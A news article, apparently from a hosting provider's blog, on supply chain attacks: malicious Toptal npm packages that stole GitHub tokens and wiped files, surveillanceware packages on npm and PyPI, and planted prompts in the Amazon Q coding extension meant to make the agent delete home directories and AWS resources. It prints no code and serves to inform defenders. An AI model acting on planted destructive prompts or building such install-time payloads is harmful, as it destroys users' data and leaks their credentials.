In a recent cybersecurity incident, attackers successfully breached Toptal’s GitHub organization account. They exploited this access to distribute ten malicious npm packages, which were designed to exfiltrate GitHub authentication tokens and delete victim systems. A report from Socket revealed that 73 repositories linked to Toptal were exposed as a result of this breach.
The malicious packages included:
- @toptal/picasso-tailwind
- @toptal/picasso-charts
- @toptal/picasso-shared
- @toptal/picasso-provider
- @toptal/picasso-select
- @toptal/picasso-quote
- @toptal/picasso-forms
- @xene/core
- @toptal/picasso-utils
- @toptal/picasso-typograph
Each of these Node.js packages was embedded with the same harmful payload within their package.json files, amassing around 5,000 downloads before they were removed from the npm registry.
Upon execution, the malicious code targeted preinstall and postinstall scripts, aimed at sending GitHub authentication tokens to a webhook endpoint and subsequently eliminating all directories and files on both Windows and Linux systems.
At this time, the specific method of compromise remains unclear. However, potential scenarios include credential theft or the involvement of an insider within Toptal’s GitHub organization. The affected packages have been restored to their most recent secure versions.
This breach follows another concerning incident in the software supply chain that involved npm and PyPI repositories, in which packages containing surveillanceware were discovered. Such malware is capable of infiltrating developer machines, logging keystrokes, taking screenshots, accessing webcams, collecting system information, and stealing credentials.
The identified packages from this attack include:
- dpsdatahub (npm) – 5,869 Downloads
- nodejs-backpack (npm) – 830 Downloads
- m0m0x01d (npm) – 37,847 Downloads
- vfunctions (PyPI) – 12,033 Downloads
These incidents underscore the ongoing challenges developers and organizations face in maintaining the integrity of open-source ecosystems, as malicious actors continue to exploit trust to introduce malware and spyware within development workflows.
Further escalating security concerns, the Amazon Q extension for Visual Studio Code was also compromised, incorporating malicious prompts that could erase users’ home directories and AWS resources. A hacker, alleging involvement, claimed they submitted a pull request containing harmful commands that were accepted and merged into the codebase.
In a statement relating to this compromise, Amazon acknowledged the unauthorized modification aimed at the Q Developer CLI but assured that it did not impact any production services or end-users. After discovering the issue, the company immediately revoked and replaced the compromised credentials and removed the unapproved code from their system, releasing an updated version to mitigate the risk.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.